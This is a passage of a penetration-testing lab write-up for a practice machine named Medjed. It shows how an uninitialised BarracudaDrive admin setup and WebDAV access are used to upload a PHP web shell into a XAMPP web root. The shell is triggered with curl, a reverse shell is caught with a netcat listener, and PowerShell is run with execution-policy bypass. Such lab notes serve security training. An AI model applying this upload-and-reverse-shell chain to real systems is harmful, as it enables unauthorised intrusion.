InfoSec LAB

Medjed_Exploitation

Created: 2 min read

Arbitrary File Upload

The target BarracudaDrive instance is accessible over two separate ports: port 8000 for HTTP and port 44330 for HTTPS. A critical issue has been identified. The instance has not been properly initialized, which allows unauthorized users to create an administrative account without authentication.

BarracudaDrive includes the web file server that leverages a WebDAV server for client connections. Given the privileges associated with an administrator account, an attacker can exploit this to upload arbitrary files directly to the target’s filesystem, potentially leading to further compromise of the environment.

dav:/fs/C/> cd xampp/htdocs
dav:/fs/C/xampp/htdocs/> ls
Listing collection `/fs/C/xampp/htdocs/': succeeded.
        index.html                           887  Nov  3  2020
        phpinfo.php                           21  Nov  3  2020
        script.js                           3023  Nov  3  2020
        styles.css                          1266  Nov  3  2020

The C:\xampp\htdocs directory appears to be the web root directory for the PHP quiz app on port 45332 and 45443

dav:/fs/C/xampp/htdocs/> put shell.php 
Uploading shell.php to `/fs/C/xampp/htdocs/shell.php':
Progress: [=============================>] 100.0% of 9296 bytes succeeded.

Successfully uploaded the payload to the C:\xampp\htdocs directory

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ curl -s http://$IP:45332/shell.php
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ curl -s http://$IP:45443/shell.php

Invoking..

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/medjed]
└─$ nnc 9999
listening on [any] 9999 ...
connect to [192.168.45.195] from (UNKNOWN) [192.168.156.127] 50326
SOCKET: Shell has connected! PID: 1792
Microsoft Windows [Version 10.0.19042.1387]
(c) Microsoft Corporation. All rights reserved.
 
C:\xampp\htdocs> powershell -ep bypass -nop
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
 
Try the new cross-platform PowerShell https://aka.ms/pscore6
 
PS C:\xampp\htdocs> whoami
medjed\jerren
PS C:\xampp\htdocs> hostname
medjed
PS C:\xampp\htdocs> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0:
 
   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 192.168.156.127
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.156.254

Initial Foothold established to the target system as the jerren user via arbitrary file upload

Interactive Graph View

Backlinks